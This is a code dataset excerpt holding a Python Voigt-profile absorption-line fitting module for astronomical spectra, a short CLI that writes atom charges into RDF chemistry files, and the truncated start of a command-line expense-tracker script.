wave2))[0]\n    linelist = linelist[lineshere]\n    linelist['ions'] = atomicdata.lam2ion(linelist['restwave'])\n\n    linelist.sort(['ions', 'zsys', 'vel', 'restwave'])\n\n    linerestwave = linelist['restwave']\n    zs = linelist['zsys']\n    linecol = linelist['col']\n    lineb = linelist['bval']\n    linevel = linelist['vel']\n    linevlim1 = linelist['vlim1']\n    linevlim2 = linelist['vlim2']\n    colflag = linelist['nflag']\n    bflag = linelist['bflag']\n    velflag = linelist['vflag']\n    restwaves = linerestwave\n    if (('rely' in linelist.colnames) and ('comment' in linelist.colnames)):\n        pass\n    elif ('rely' in linelist.colnames):\n        linelist['comment'] = ['none'] * len(linelist)\n    else:\n        linelist['rely'] = ['-'] * len(linelist)\n        linelist['comment'] = ['none'] * len(linelist)\n\n    reliability = linelist['rely']\n    comment = linelist['comment']\n    initinfo = [colflag, bflag, velflag]\n    initpars = [restwaves, linecol, lineb, zs, linevel, linevlim1, linevlim2]\n    fitpars, parinfo = initlinepars(zs, restwaves, initpars, initinfo=initinfo)\n    fiterrors = np.zeros([5, len(fitpars[0])])  # Initialize errors to zero\n    #fiterrors[1] = colsig\n    #fiterrors[2] = bsig\n    #fiterrors[4] = velsig\n    linecmts = [reliability, comment]\n\n    return fitpars, fiterrors, parinfo, linecmts\n\n\ndef initlinepars(zs, restwaves, initvals=[], initinfo=[]):\n    '''\n\n    Parameters\n    ----------\n    zs : numpy vector of floats\n        Redshifts of lines (this parameter will be fixed during fitting)\n    restwaves : numpy vector of floats\n        Rest frame wavelengths of lines to be fitted\n    initvals : list of numpy vectors, optional\n        Contains the following (in order): [restwaves,linecol,lineb,zs,linevel,linevlim1,linevlim2]\n        Will default to values set in cfg.py if not set\n    initinfo : list of numpy vectors, optional\n        Contains the flags for fitting (in order): [colflag,bflag,velflag]\n        Parameters with flags = 0 and 1 will vary freely and be fixed, respectively\n        If 2 or more lines have the same flag value for the same parameter, the parameters will\n        be tied to one another.\n\n    Returns\n    -------\n    initpars : list of lists\n        Parameters for fit ready for fitter!\n    parinfo : array of arrays\n        Flags to be used in fit\n    '''\n\n    ### Set atomic data for each line\n    lam, fosc, gam = atomicdata.setatomicdata(restwaves)\n    cfg.lams = lam\n    cfg.fosc = fosc\n    cfg.gam = gam\n\n    initpars = [[], [], [], [], [], [], []]\n    defaultcol = cfg.defaultcol\n    defaultb = cfg.defaultb\n    if initvals == []:\n        for i in range(len(restwaves)):\n            initpars[0].extend([restwaves[i]])\n            initpars[1].extend([defaultcol])\n            initpars[2].extend([defaultb])\n            
initpars[3].extend([zs[i]])\n initpars[4].extend([0.])\n initpars[5].extend([-cfg.defaultvlim])\n initpars[6].extend([cfg.defaultvlim])\n else:\n if len(initvals) == 5:\n for i in range(len(restwaves)):\n initpars[0].extend([initvals[0][i]])\n initpars[1].extend([initvals[1][i]])\n initpars[2].extend([initvals[2][i]])\n initpars[3].extend([initvals[3][i]])\n initpars[4].extend([initvals[4][i]])\n initpars[5].extend([-cfg.defaultvlim])\n initpars[6].extend([cfg.defaultvlim])\n else:\n initpars = [[], [], [], [], [], [], []]\n for i in range(len(restwaves)):\n initpars[0].extend([initvals[0][i]])\n initpars[1].extend([initvals[1][i]])\n initpars[2].extend([initvals[2][i]])\n initpars[3].extend([initvals[3][i]])\n initpars[4].extend([initvals[4][i]])\n initpars[5].extend([initvals[5][i]])\n initpars[6].extend([initvals[6][i]])\n\n ### If hard limits on Doppler b-value are smaller or greater than cfg.lowblim or cfg.upperblim,\n ### modify those limits\n maxb = np.max(initpars[2][:])\n minb = np.min(initpars[2][:])\n if maxb > cfg.upperblim:\n cfg.upperblim = maxb + 10.\n if minb < cfg.lowblim: cfg.lowblim = minb - 2.\n\n parinfo = np.zeros([5, len(restwaves)], dtype=int)\n parinfo[0] = parinfo[0] + 1\n parinfo[3] = parinfo[3] + 1\n if ((initinfo == []) & (initvals == [])):\n\n ### Look for multiplet membership of each line\n seriesassoc = np.zeros(len(restwaves)) - 99\n for i in range(len(restwaves)):\n for j in range(len(cfg.multiplets)):\n currmult = np.array(cfg.multiplets[j])\n if (abs(restwaves[i] -\n currmult[jbg.closest(currmult, restwaves[i])]) < 0.01):\n seriesassoc[i] = j\n\n uqions = np.unique(seriesassoc).tolist()\n\n if -99 in uqions: uqions.remove(-99)\n flagctr = 2\n for uqion in uqions:\n ionmatch = np.where(seriesassoc == uqion)[0]\n uqzs = np.unique(zs[ionmatch])\n for uz in uqzs:\n matchcrit = (zs == uz) & (seriesassoc == uqion)\n rellines = np.where(matchcrit)[0]\n uqlams = np.unique(restwaves[rellines])\n if len(uqlams) > 1:\n complist = []\n numcomps = []\n for ul in uqlams:\n matchcrit2 = matchcrit & (restwaves == ul)\n matches = np.where(matchcrit2)[0]\n complist.append(matches)\n numcomps.append(len(matches))\n numcomps = np.array(numcomps)\n complist = np.array(complist)\n compidxsort = sorted(range(len(numcomps)),\n key=lambda x: numcomps[x],\n reverse=True)\n numcompsort = numcomps[compidxsort]\n complistsort = complist[compidxsort]\n maxcomps = numcompsort[0]\n for compidx in range(maxcomps):\n for li in range(len(complistsort)):\n if compidx < numcompsort[li]:\n parinfo[1][complistsort[li][compidx]] = flagctr\n parinfo[2][complistsort[li][compidx]] = flagctr\n parinfo[4][complistsort[li][compidx]] = flagctr\n else:\n continue\n flagctr += 1\n\n elif initinfo != []:\n parinfo[1] = initinfo[0]\n parinfo[2] = initinfo[1]\n parinfo[4] = initinfo[2]\n elif ((initinfo == []) & (initvals != [])):\n\n ### Look for multiplet membership of each line\n seriesassoc = np.zeros(len(restwaves)) - 99\n for i in range(len(restwaves)):\n for j in range(len(cfg.multiplets)):\n currmult = np.array(cfg.multiplets[j])\n if (abs(restwaves[i] -\n currmult[jbg.closest(currmult, restwaves[i])]) < 0.01):\n seriesassoc[i] = j\n\n ### Fix measurements that are imported\n for i in range(len(restwaves)):\n if ((initpars[1][i] != defaultcol) & (initpars[2][i] != defaultb)):\n parinfo[1][i] = 1\n parinfo[2][i] = 1\n parinfo[4][i] = 1\n uqions = np.unique(seriesassoc).tolist()\n if -99 in uqions: uqions.remove(-99)\n flagctr = 2\n for uqion in uqions:\n ionmatch = np.where(seriesassoc == 
uqion)[0]\n uqzs = np.unique(zs[ionmatch])\n for uz in uqzs:\n matchcrit = (zs == uz) & (seriesassoc == uqion)\n rellines = np.where(matchcrit)[0]\n uqlams = np.unique(restwaves[rellines])\n if len(uqlams) > 1:\n complist = []\n numcomps = []\n for ul in uqlams:\n matchcrit2 = matchcrit & (restwaves == ul)\n matches = np.where(matchcrit2)[0]\n complist.append(matches.tolist())\n numcomps.append(len(matches))\n numcomps = np.array(numcomps)\n complist = np.array(complist)\n compidxsort = sorted(range(len(numcomps)),\n key=lambda x: numcomps[x])\n complistsort = complist[compidxsort]\n complistsort = complistsort.tolist()\n for i in range(len(complistsort) - 1):\n for idx in complistsort[i]:\n parinfo[1][idx] = flagctr\n parinfo[2][idx] = flagctr\n parinfo[4][idx] = flagctr\n for j in range(i + 1, len(complistsort)):\n idxidx = jbg.closest(\n initvals[4][complistsort[j]],\n initvals[4][idx])\n clidx = complistsort[j][idxidx]\n parinfo[1][clidx] = flagctr\n parinfo[2][clidx] = flagctr\n parinfo[4][clidx] = flagctr\n complistsort[j].remove(clidx)\n flagctr += 1\n\n return initpars, parinfo\n\n\ndef prepparinfo(linepars, parflags):\n parinfo = []\n parflags = np.array(parflags)\n numpars = 5\n for i in range(len(parflags[0])):\n parinfo.extend([{\n 'fixed': 1\n }, {\n 'fixed': 0\n }, {\n 'fixed': 0\n }, {\n 'fixed': 1\n }, {\n 'fixed': 0\n }])\n for j in range(1, len(parflags)):\n if parflags[j][i] == 1: parinfo[i * numpars + j]['fixed'] = 1\n elif parflags[j][i] <= 0: parinfo[i * numpars + j]['fixed'] = 0\n else:\n matches = np.where(np.array(parflags[j]) == parflags[j][i])[0]\n if matches[0] != i:\n tiedpar = int(matches[0] * numpars + j)\n parinfo[i * numpars +\n j]['tied'] = 'p[' + str(tiedpar) + ']'\n col = round(linepars[1][i], 2)\n vel = round(linepars[4][i], 2)\n bpar = round(linepars[2][i], 2)\n parinfo[numpars * i + 1]['limited'] = [1, 1]\n parinfo[numpars * i +\n 1]['limits'] = [round(col - 5., 2),\n round(col + 5., 2)]\n parinfo[numpars * i + 2]['limited'] = [1, 1]\n ### adjust b-value limits to allow for broadened HI features\n lydiff = abs(linepars[0][i] - cfg.lyseries)\n lymatch = np.where(abs(lydiff) <= 0.05)[0]\n if lymatch:\n parinfo[numpars * i + 2]['limits'] = [\n max([cfg.lowblim, bpar - 10.]),\n min([bpar + 10, cfg.upperblim_HI])\n ]\n else:\n parinfo[numpars * i + 2]['limits'] = [\n max([cfg.lowblim, bpar - 10.]),\n min([bpar + 10, cfg.upperblim])\n ]\n parinfo[numpars * i + 2]['step'] = 0.5\n parinfo[numpars * i + 2]['mpside'] = 2\n #parinfo[numpars*i+2]['relstep']=0.0001\n parinfo[numpars * i + 4]['limited'] = [1, 1]\n ### Allow velocity to flop around\n if parflags[4][i] < 0:\n flopamt = abs(parflags[4][i])\n parinfo[numpars * i + 4]['limits'] = [\n round(vel - flopamt, 2),\n round(vel + flopamt, 2)\n ]\n elif len(linepars) > 5:\n v1 = round(linepars[5][i], 2)\n v2 = round(linepars[6][i], 2)\n parinfo[numpars * i + 4]['limits'] = [v1, v2]\n else:\n parinfo[numpars * i +\n 4]['limits'] = [round(vel - 50., 2),\n round(vel + 50., 2)]\n parinfo[numpars * i + 4]['step'] = 1.\n #parinfo[numpars*i+4]['relstep']=0.01\n return parinfo\n\n\ndef fitpix(wave, pararr, find_bad_pixels=True):\n\n if find_bad_pixels:\n # define bad pixels\n cfg.bad_pixels = update_bad_pixels(\n ) # this variable stores the indices of bad pixels\n else:\n cfg.bad_pixels = []\n\n ll = pararr[0]\n lz = pararr[3]\n lv1 = pararr[5]\n lv2 = pararr[6]\n relpix = []\n for i in range(len(ll)):\n vels = jbg.veltrans(lz[i], wave, ll[i])\n p1 = jbg.closest(vels, lv1[i])\n p2 = jbg.closest(vels, lv2[i])\n\n if 
((p1 >= 10) & (p2 <= (len(wave) - 1 - 10))):\n            relpix.extend(range(p1 - 10, p2 + 10))\n        elif (p1 < 10):\n            relpix.extend(range(0, p2 + 10))\n        else:\n            relpix.extend(range(p1 - 10, len(wave) - 1))\n    rp = np.unique(np.array(relpix))\n    clean_rp = np.array([i for i in rp if i not in cfg.bad_pixels])\n    return clean_rp\n\n\ndef stevevoigterrfunc(x, xall0, notfixed, indices, wavelength, flux, sig):\n    xall = xall0.copy()\n\n    xall[notfixed] = x[indices]\n\n    folded_xall = foldpars(xall)\n    model = voigtfunc(wavelength, folded_xall)\n    status = 0\n\n    residuals = (flux[cfg.fitidx] - model[cfg.fitidx]) / sig[cfg.fitidx]\n\n    try:\n        residuals = residuals.value\n    except AttributeError:\n        pass\n    return (residuals)\n\n\ndef update_bad_pixels():\n    # define bad pixels\n    cond_badpix = (cfg.spectrum.wavelength <= cfg.spectrum.wvmin) | \\\n                  (cfg.spectrum.wavelength >= cfg.spectrum.wvmax) | \\\n                  (cfg.spectrum.sig <= 0)\n    #(cfg.spectrum.flux / cfg.spectrum.sig < cfg.min_sn) # bad S/N\n    # spectral gaps\n    for gap in cfg.spectral_gaps:\n        cond_gap = (cfg.spectrum.wavelength >=\n                    gap[0] * u.AA) & (cfg.spectrum.wavelength <= gap[1] * u.AA)\n        cond_badpix = cond_badpix | cond_gap\n    bad_pixels = np.where(cond_badpix)[0]\n    return bad_pixels\n\n\ndef various_indices(parinfo):\n    \"\"\"\n    Parameters:\n    -----------\n\n    parinfo : list of dictionaries\n\n    Returns:\n    --------\n\n    pfixed : list of integers in numpy array\n        fixed/unfixedness of parameters.\n    ptied : list of strings in numpy array\n        tiedness or lack thereof of parameters.\n    ifree : list of integers in numpy array\n        indices of free parameters.\n    indices : list of floats in numpy array\n        index indicating which other tied parameter a given parameter is tied to.\n\n    \"\"\"\n\n    npar = len(parinfo)\n\n    indices = np.zeros([npar])\n\n    ## FIXED parameters ?\n    pfixed = parameterInformationFunction(parinfo, 'fixed', default=0, n=npar)\n\n    ptied = parameterInformationFunction(parinfo, 'tied', default='', n=npar)\n\n    qanytied = 0\n    for i in range(npar):\n        ptied[i] = ptied[i].strip()\n        if (ptied[i] != ''): qanytied = 1\n\n    kk = 0\n    for ii in range(len(indices)):\n        if pfixed[ii] == 1:\n            continue\n        else:\n            if ptied[ii] == '':\n\n                indices[ii] = kk\n\n                kk = kk + 1\n            else:\n                ll = int(ptied[ii][2:-1])\n                indices[ii] = indices[ll]\n\n    ## Finish up the free parameters\n    ifree = np.where(np.array(pfixed) == 0)\n    nfree = len(ifree[0])\n    if nfree == 0:\n        raise ValueError('no free parameters.')\n\n    inotfixed = np.where(np.array(pfixed) == 0)\n\n    indices = indices[inotfixed]\n\n    for i in range(npar):\n        pfixed[i] = pfixed[i] or (\n            ptied[i] != '')  ## Tied parameters are also effectively fixed\n    return (pfixed, ptied, ifree, indices)\n\n\ndef parameterInformationFunction(parinfo=None, key='a', default=None, n=0):\n    #if (self.debug): print('Entering parinfo...')\n\n    # makes sure n is the length of parinfo:\n    if (n == 0) and (parinfo is not None): n = len(parinfo)\n\n    # returns nothing if parinfo is empty:\n    if (n == 0):\n        values = default\n        return (values)\n\n    # makes a list of the values of the specified key/item for each parameter\n    values = []\n    for i in range(n):\n        if ((parinfo is not None) and (key in parinfo[i])):\n            values.append(parinfo[i][key])\n        else:\n            values.append(default)\n\n    # Convert to numeric arrays if possible\n    test = default\n    if (type(default) == list): test = default[0]\n    if (type(test) == int):\n        values = np.asarray(values, dtype=int)\n    elif (type(test) == float):\n        values = np.asarray(values, dtype=float)\n\n    return (values)\n\n\n# here are the functions needed for calculating fit errors in stevebvpfit:\n
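# (calc_covar rebuilds a covariance matrix from the factored, pivoted R matrix;\n#  calc_perrors maps Jacobian-based 1-sigma errors back onto the full parameter grid.)\n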
\n\ndef calc_covar(rr, ipvt=None, tol=1.e-14):\n\n    if np.ndim(rr) != 2:\n        print('ERROR: r must be a two-dimensional matrix')\n        return (-1)\n    s = np.shape(rr)\n    n = s[0]\n    if s[0] != s[1]:\n        print('ERROR: r must be a square matrix')\n        return (-1)\n\n    if (ipvt is None): ipvt = np.arange(n)\n    r = rr.copy()\n    r.shape = [n, n]\n\n    ## For the inverse of r in the full upper triangle of r\n    l = -1\n    tolr = tol * abs(r[0, 0])\n    for k in range(n):\n        if (abs(r[k, k]) <= tolr): break\n        r[k, k] = 1. / r[k, k]\n        for j in range(k):\n            temp = r[k, k] * r[j, k]\n            r[j, k] = 0.\n            r[0:j + 1, k] = r[0:j + 1, k] - temp * r[0:j + 1, j]\n        l = k\n\n    ## Form the full upper triangle of the inverse of (r transpose)*r\n    ## in the full upper triangle of r\n    if l >= 0:\n        for k in range(l + 1):\n            for j in range(k):\n                temp = r[j, k]\n                r[0:j + 1, j] = r[0:j + 1, j] + temp * r[0:j + 1, k]\n            temp = r[k, k]\n            r[0:k + 1, k] = temp * r[0:k + 1, k]\n\n    ## For the full lower triangle of the covariance matrix\n    ## in the strict lower triangle or and in wa\n    wa = np.repeat([r[0, 0]], n)\n    for j in range(n):\n        jj = ipvt[j]\n        sing = j > l\n        for i in range(j + 1):\n            if sing: r[i, j] = 0.\n            ii = ipvt[i]\n            if ii > jj: r[ii, jj] = r[i, j]\n            if ii < jj: r[jj, ii] = r[i, j]\n        wa[jj] = r[j, j]\n\n    ## Symmetrize the covariance matrix in r\n    for j in range(n):\n        r[0:j + 1, j] = r[j, 0:j + 1]\n        r[j, j] = wa[j]\n\n    return (r)\n\n\ndef calc_perrors(jac, ifree, numpars=5):\n    n = len(ifree)\n    try:\n        rr = np.linalg.inv(jac.T @ jac)\n    except np.linalg.LinAlgError:\n        # idk should I do this?\n        rr = np.linalg.pinv(jac.T @ jac)\n        print('using pseudo inverse for Jacobian')\n    covar = np.zeros([numpars, numpars], float)\n\n    for i in range(n):\n        idx = ifree + ifree[i] * numpars\n        np.put(covar, idx, rr[:, i])\n\n    d = np.sqrt(np.diagonal(covar))\n\n    return (d)\n\n\n# The main event:\ndef stevebvpfit(wave, flux, sig, flags, linepars=None, xall=None):\n\n    if (linepars is None):\n        raise ValueError('Must pass parameters in linepars.')\n\n    # Only feed to the fitter the parameters that go into the model\n    partofit = linepars[:5]\n\n    parinfo = prepparinfo(partofit, flags)\n\n    npar = len(parinfo)\n\n    ## Be sure that PARINFO is of the right type\n    if (type(parinfo) != list):\n        raise ValueError('PARINFO must be a list of dictionaries.')\n    if (type(parinfo[0]) != dict):\n        raise ValueError('PARINFO must be a list of dictionaries.')\n\n    ## If the parameters were not specified at the command line, then\n    ## extract them from PARINFO\n\n    if (xall is None):\n\n        xall = parameterInformationFunction(parinfo, 'value')\n        if (xall is None):\n            raise ValueError(\n                'either xall or PARINFO(*)[\"value\"] must be supplied.')\n        xall = np.ravel(np.array(xall).T)\n\n    # function that deals with tied and fixed parameters and creates\n    # indices list to go from non-redundant to redundant array:\n\n    indices_and_friends = various_indices(parinfo)\n\n    pfixed, ptied, ifree, indices = indices_and_friends\n\n    indices = indices.astype(int)\n    ifree = np.squeeze(ifree)\n    ## Compose only VARYING parameters\n    x = np.squeeze(xall)[np.squeeze(\n        pfixed == 0)]  ## x is the set of free parameters\n\n    ## LIMITED parameters ?\n    limited = parameterInformationFunction(parinfo,\n                                           'limited',\n                                           default=[0, 0],\n                                           n=npar)\n    limits = parameterInformationFunction(parinfo,\n                                          'limits',\n                                          default=[0., 0.],\n                                          n=npar)\n\n    if (limited is not None) and (limits is not None):\n\n        ## Error checking on limits in parinfo\n
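        ## limited[:, k] flags whether a lower/upper bound applies and limits[:, k] holds the\n        ## bound itself; reject any starting value that already sits outside its own bounds.\n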
        wh = np.nonzero((limited[:, 0] & (xall < limits[:, 0]))\n                        | (limited[:, 1] & (xall > limits[:, 1])))\n\n        if (len(wh[0]) > 0):\n            raise ValueError('parameters are not within PARINFO limits')\n\n        wh = np.nonzero((limited[:, 0] & limited[:, 1])\n                        & (limits[:, 0] >= limits[:, 1]) & (pfixed == 0))\n        if (len(wh[0]) > 0):\n            raise ValueError('PARINFO parameter limits are not consistent')\n    freeanduntied = np.where(np.squeeze(pfixed == 0))[0]\n    ## Transfer structure values to local variables\n    qulim = np.take(limited[:, 1], freeanduntied)\n    ulim = np.take(limits[:, 1], freeanduntied)\n    qllim = np.take(limited[:, 0], freeanduntied)\n    llim = np.take(limits[:, 0], freeanduntied)\n\n    # Save the velocity windows to add back to the parameter array\n    vlim1 = linepars[5]\n    vlim2 = linepars[6]\n    # Get atomic data\n    lam, fosc, gam = atomicdata.setatomicdata(linepars[0])\n    cfg.lams = lam\n    cfg.fosc = fosc\n    cfg.gam = gam\n    # Set fit regions\n    cfg.fitidx = fitpix(wave, linepars)\n\n    # Prep parameters for fitter\n\n    partofit = unfoldpars(partofit)\n\n    modelvars = {'l': wave, 'y': flux, 'err': sig}\n\n    bnds = (np.squeeze(np.where(qllim == 1, llim, -np.inf)),\n            np.squeeze(np.where(qulim == 1, ulim, np.inf)))\n\n    arg = [\n        xall, ifree, indices, modelvars['l'], modelvars['y'], modelvars['err']\n    ]\n\n    # here is where fitting happens:\n\n    m = least_squares(stevevoigterrfunc,\n                      x,\n                      bounds=bnds,\n                      args=arg,\n                      kwargs={},\n                      verbose=True)\n\n    if m.status < 0: print('Fitting error:', m.message)\n\n    xall_fitted = xall.copy()\n\n    xall_fitted[ifree] = m['x'][indices]\n\n    fitpars = foldpars(xall_fitted)\n\n    # This is a super-hacky fix to the issue of parameters having Jacobians of 0.\n    # It could obscure other problems and so it would make sense to replace it\n    # at some point.\n    badvarmask = np.all(np.isclose(m.jac, 1e-10), axis=0)\n    if np.any(badvarmask):\n        try:\n            bad_var_ind, = np.where(badvarmask)\n            # Replacing bad columns with value near 0.\n            m.jac[:, bad_var_ind] = 1e-5\n            # Giving rest wavelength and redshift of bad lines. Also really janky in and\n            # of itself so that's fun.\n            bad_var_indices_mask = np.in1d(indices, bad_var_ind)\n            bad_ifree = ifree[bad_var_indices_mask]\n            bad_comp_inds = np.unique(bad_ifree // 5)\n            for comp in bad_comp_inds:\n                bad_wav = fitpars[0][comp]\n                bad_red = fitpars[3][comp]\n                print('Bad component of {0:.5f} at {1:.5f}.'.format(\n                    float(bad_wav), float(bad_red)))\n        except IndexError:\n            pass\n\n    perr = calc_perrors(m.jac, freeanduntied, numpars=xall.size)\n\n    fitperr = foldpars(perr)\n\n    for par in perr:\n        par = np.ravel(np.array(par))\n\n    # Adding in reduced chi-squared bit:\n    rchi2 = 2 * m.cost / (len(cfg.fitidx) - len(freeanduntied))\n    # Add velocity windows back to parameter array\n    fitpars.append(vlim1)\n    fitpars.append(vlim2)\n\n    # prints results in terminal/notebook/whatever thing you have python running from\n    print('\\nFit results: \\n')\n    for i in range(len(fitpars[0])):\n        print(\n            jbg.tabdelimrow([\n                round(fitpars[0][i], 2),\n                jbg.decimalplaces(fitpars[3][i], 5),\n                jbg.roundto(fitpars[1][i], 5),\n                jbg.roundto(fitpars[2][i], 5),\n                jbg.roundto(fitpars[4][i], 5)\n            ])[:-2])\n        print(\n            jbg.tabdelimrow([\n                ' ', ' ', ' ',\n                round(fitperr[1][i], 3),\n                round(fitperr[2][i], 3),\n                round(fitperr[4][i], 3)\n            ]))\n    print('\\nReduced chi-squared: {0:f}'.format(rchi2))\n    return fitpars, fitperr, rchi2\n\n\n# ... 
the other main event:\ndef fit_to_convergence(wave,\n flux,\n sig,\n flags,\n linepars,\n xall,\n maxiter=50,\n itertol=0.0001):\n '''\n\n Parameters\n ----------\n wave\n flux\n sig\n flags\n linepars\n xall\n\n maxiter : int\n Maximum number of times to run the fit while striving for convergence\n\n itertol : float\n Maximum difference in any parameter from one fitting iteration to the next. Routine will fit again if\n any difference in the measurements exceeds itertol.\n\n\n Returns\n -------\n\n '''\n fitpars = linepars\n oldfitpars = np.zeros([7, len(fitpars[0])]) - 99\n ctr = 0\n okay = 1\n while ((np.max(np.abs(fitpars - oldfitpars)) > itertol) & (ctr < maxiter)):\n ctr += 1\n\n try:\n # so the fitpars from the last iteration doesn't get erased:\n oldfitpars = fitpars\n fitpars, fiterrors, rchi2 = stevebvpfit(wave,\n flux,\n sig,\n flags,\n linepars=linepars,\n xall=xall)\n fitpars = np.array(fitpars)\n print('Iteration', ctr, '-')\n\n except:\n print('Fitting error!')\n print(\"Unexpected error:\", sys.exc_info()[0])\n okay = 0\n raise\n\n if okay != 0:\n print('Fit converged after', ctr, 'iterations.')\n return fitpars, fiterrors, rchi2\n else:\n return linepars, fiterrors, rchi2\n\n\ndef writerchi2(rchi2, outfilename):\n '''\n Writes reduced input group's chi-squared to file.\n '''\n rchi2file = open(outfilename, 'wt')\n rchi2file.write(str(rchi2))\n rchi2file.close()\n\n\ndef writelinepars(fitpars,\n fiterrors,\n parinfo,\n specfile,\n outfilename,\n linecmts=None):\n '''\n Write fit parameters out to file.\n\n Parameters\n ----------\n fitpars : list of lists\n Parameters for fit ready for fitter!\n fiterrors : array of numpy vectors\n Error array for the fitting initialized to '0' for each param\n parinfo : array of arrays\n Flags to be used in fit\n specfile : str\n Name of the input file containing the spectrum\n outfilename : str\n Parameter output filename\n linecmts : list of lists, optional\n Reliability flags and comments, e.g., from igmguesses\n\n '''\n import os\n ### Set outputs and open files\n bigfiletowrite = cfg.largeVPparfile\n filetowrite = outfilename\n if os.path.isfile(filetowrite):\n VPparfile = open(filetowrite, 'wb')\n bigparfile = open(bigfiletowrite, 'ab') # Append to the running list\n else:\n VPparfile = open(filetowrite, 'wb')\n bigparfile = open(bigfiletowrite, 'wb')\n\n ### Prep header of line parameter file\n if linecmts is not None:\n header = b'specfile|restwave|zsys|col|sigcol|bval|sigbval|vel|sigvel|nflag|bflag|vflag|vlim1|vlim2|wobs1|wobs2|pix1|pix2|z_comp|trans|rely|comment \\n'\n else:\n header = b'specfile|restwave|zsys|col|sigcol|bval|sigbval|vel|sigvel|nflag|bflag|vflag|vlim1|vlim2|wobs1|wobs2|pix1|pix2|z_comp|trans \\n'\n VPparfile.write(header)\n bigparfile.write(header)\n\n ### Grab parameters/info for each line\n for i in range(len(fitpars[0])):\n zline = fitpars[3][i]\n vlim1 = fitpars[5][i]\n vlim2 = fitpars[6][i]\n restwave = fitpars[0][i]\n wobs1 = restwave * (1 + zline + vlim1 / c)\n wobs2 = restwave * (1 + zline + vlim2 / c)\n pix1 = jbg.closest(cfg.wave, wobs1)\n pix2 = jbg.closest(cfg.wave, wobs2)\n trans = atomicdata.lam2ion(fitpars[0][i])\n z_comp = ltu.z_from_dv(fitpars[4][i] * u.km / u.s, zline)\n if linecmts is not None:\n towrite = jbg.pipedelimrow([\n specfile, restwave,\n round(zline, 5),\n round(fitpars[1][i], 3),\n round(fiterrors[1][i], 3),\n round(fitpars[2][i], 3),\n round(fiterrors[2][i], 3),\n round(fitpars[4][i], 3),\n round(fiterrors[4][i], 3), parinfo[1][i], parinfo[2][i],\n parinfo[4][i], vlim1, vlim2, 
wobs1, wobs2, pix1, pix2,\n round(z_comp, 5), trans, linecmts[0][i], linecmts[1][i]\n ])\n else:\n towrite = jbg.pipedelimrow([\n specfile, restwave,\n round(zline, 5),\n round(fitpars[1][i], 3),\n round(fiterrors[1][i], 3),\n round(fitpars[2][i], 3),\n round(fiterrors[2][i], 3),\n round(fitpars[4][i], 3),\n round(fiterrors[4][i], 3), parinfo[1][i], parinfo[2][i],\n parinfo[4][i], vlim1, vlim2, wobs1, wobs2, pix1, pix2,\n round(z_comp, 5), trans\n ])\n VPparfile.write(towrite.encode())\n bigparfile.write(towrite.encode())\n VPparfile.close()\n bigparfile.close()\n print('Line parameters written to:')\n print(filetowrite)\n\n\ndef writeVPmodel(outfile, wave, fitpars, normflux, normsig):\n\n from astropy.table import Table\n\n model = voigtfunc(wave, fitpars)\n modeltab = Table([wave, model, normflux, normsig],\n names=['wavelength', 'model', 'normflux', 'normsig'])\n\n dummycont = np.ones(len(wave))\n\n spec = XSpectrum1D.from_tuple((modeltab['wavelength'], modeltab['model'],\n modeltab['normsig'], dummycont))\n spec.write_to_fits(outfile)\n","sub_path":"joebvp/stevebvpfit.py","file_name":"stevebvpfit.py","file_ext":"py","file_size_in_byte":34760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"121826620","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Charger is a program for modifying atom symbols in RDF\n# Copyright (C) 2014 Ramil Nugmanov\n# This program is free software: you can redistribute it and/or modify it under\n# the terms of the GNU Affero General Public License as published by the Free\n# Software Foundation, either version 3 of the License, or (at your option) any later version.\n# This program is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\n# PARTICULAR PURPOSE. See the GNU Affero General Public License for more details.\n# You should have received a copy of the GNU Affero General Public License along\n# with this program. 
If not, see http://www.gnu.org/licenses/.\n\nimport argparse\nimport re\n\n\ndef main():\n rawopts = argparse.ArgumentParser(description=\"simple CLI atom charge data generator\",\n epilog=\"created by stsouko.\")\n rawopts.add_argument(\"--version\", \"-v\", action=\"version\", version=\"0.1\", default=False)\n rawopts.add_argument(\"--input\", \"-i\", type=str, default=\"input.rdf\", help=\"RDF inputfile\")\n rawopts.add_argument(\"--charges\", \"-c\", type=str, default=\"input.chr\", help=\"chargedata inputfile\")\n rawopts.add_argument(\"--output\", \"-o\", type=str, default=\"output.rdf\", help=\"RDF outputfile\")\n rawopts.add_argument(\"--accuracy\", \"-a\", type=float, default=.1, help=\"accuracy\")\n options = vars(rawopts.parse_args())\n\n try:\n out = open(options['output'], 'w')\n except:\n print('error write to file')\n return 0\n try:\n data = open(options['charges'])\n except:\n print('error read file')\n return 0\n data.next()\n charges = []\n for i in data:\n charges += i.strip().split('\\t')[1].split(';')\n data = iter(charges)\n\n accuracy = 1 / options['accuracy']\n for l in open(options['input']):\n if re.search('(\\s+-?[0-9]+\\.[0-9]+){3}\\s+[A-Z][a-z]?(\\s+-?[0-9]+){12}', l):\n l = l[:31] + '%-3d' % (accuracy * (float(data.next().replace(',', '.')) + 5)) + l[34:]\n out.write(l)\n return 0\n\n\nif __name__ == '__main__':\n main()","sub_path":"charger.py","file_name":"charger.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"191611314","text":"from __future__ import print_function, unicode_literals\nfrom PyInquirer import style_from_dict, Token, prompt, Separator\nfrom PyInquirer import Validator, ValidationError\n\n\n# terminal coloring and bolding\nclass color:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\n\nclass NumberValidator(Validator):\n def validate(self, document):\n try:\n float(document.text)\n except ValueError:\n raise ValidationError(\n message=\"Please enter a dollar amount without the '$'.\",\n cursor_position=len(document.text)) # Move cursor to end\n\n\n# def intro():\n# questions = [\n# {\n# 'type': 'list',\n# 'name': 'action',\n# 'message': 'What do you want to do?',\n# 'choices': [\n# 'Add a new expense',\n# 'View expenses by card',\n# Separator(),\n# 'Edit a current expense',\n# 'Delete a current expense',\n# Separator(),\n# 'View unsubmitted expenses',\n# 'View submitted expenses',\n# 'View expenses by vendor',\n# 'View all expenses',\n# Separator(),\n# 'Mark expenses(s) as submitted',\n# 'Mark expenses(s) as unsubmitted',\n# Separator(),\n# 